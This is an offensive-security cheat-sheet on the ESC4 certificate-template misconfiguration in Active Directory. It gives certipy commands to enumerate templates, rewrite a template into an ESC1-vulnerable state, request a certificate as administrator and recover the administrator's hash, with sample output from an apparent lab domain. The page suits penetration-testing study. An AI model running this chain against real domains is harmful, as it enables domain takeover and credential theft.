👾 Overview
ESC4 is a common ADCS vulnerability where a misconfigured Certificate Template grants dangerous permissions to a given user or group. This allows them to rewrite the template to become vulnerable to ESC1.
🔍 Discovery
Certipy is the go to tool for findings and exploiting many common ADCS vulnerabilities.
# Enumerate ADCS vulnerabilities with certipy
certipy-ad find -username [username]@[domain] -password [password] -dc-ip [IP]Running certipy will require a domain user, and it will generate multiple output files including JSONs, these can be manually examined or put into BloodHound.
In the JSON output, certipy will flag a given template as vulnerable:
"Certificate Templates": {
"0": {
"Template Name": "SendaiComputer",
"Display Name": "SendaiComputer",
"Certificate Authorities": [
"sendai-DC-CA"
],
"Enabled": true,
"Client Authentication": true,
"Enrollment Agent": false,
"Any Purpose": false,
"Enrollee Supplies Subject": false,
"Certificate Name Flag": [
"SubjectAltRequireDns"
],
"Enrollment Flag": [
"AutoEnrollment"
],
"Private Key Flag": [
"16842752"
],
"Extended Key Usage": [
"Server Authentication",
"Client Authentication"
],
"Requires Manager Approval": false,
"Requires Key Archival": false,
"Authorized Signatures Required": 0,
"Validity Period": "100 years",
"Renewal Period": "6 weeks",
"Minimum RSA Key Length": 4096,
"Permissions": {
"Enrollment Permissions": {
"Enrollment Rights": [
"SENDAI.VL\\Domain Admins",
"SENDAI.VL\\Domain Computers",
"SENDAI.VL\\Enterprise Admins"
]
},
"Object Control Permissions": {
"Owner": "SENDAI.VL\\Administrator",
"Full Control Principals": [
"SENDAI.VL\\ca-operators"
],
"Write Owner Principals": [
"SENDAI.VL\\Domain Admins",
"SENDAI.VL\\Enterprise Admins",
"SENDAI.VL\\Administrator",
"SENDAI.VL\\ca-operators"
],
"Write Dacl Principals": [
"SENDAI.VL\\Domain Admins",
"SENDAI.VL\\Enterprise Admins",
"SENDAI.VL\\Administrator",
"SENDAI.VL\\ca-operators"
],
"Write Property Principals": [
"SENDAI.VL\\Domain Admins",
"SENDAI.VL\\Enterprise Admins",
"SENDAI.VL\\Administrator",
"SENDAI.VL\\ca-operators"
]
}
},
"[!] Vulnerabilities": {
"ESC4": "'SENDAI.VL\\\\ca-operators' has dangerous permissions"
}📌 Exploitation
To exploit this, you’ll need to have access to the user or group with write permissions over the template, and temporarily rewrite it to be vulnerable to ESC1.
# Make template vuln to ESC1
certipy template -username [username]@[domain] -password [pass] -dc-ip [IP] -template [template] -save-oldThis will make the template vulnerable to ESC1, and create a backup that we can restore later. Next, we can exploit ESC1 by requesting a certificate as the administrator.
# Exploit ESC1
certipy req -username [username]@[domain] -password [pass] -dc-ip [ip] -ca [ca-name] -target [dc-hostname] -template [template] -upn administrator@[domain]We can then use this to authenticate and get the administrator’s hash.
# Authenticate and get the user's hash
sudo certipy-ad auth -pfx '[USERNAME].pfx' -username '[USERNAME]' -domain '[domain]' -dc-ip [ip]✨ Post-Exploitation
Afterwards, we can restore the original template to clean up.
# Restore config
certipy template -username [username]@[domain] -password [pass] -dc-ip [ip] -template [template] -configuration [template].json📝 Resources
| 🔗 Hyperlink | ℹ️ Info |
|---|---|
| SpecterOps | Certified Pre-Owned |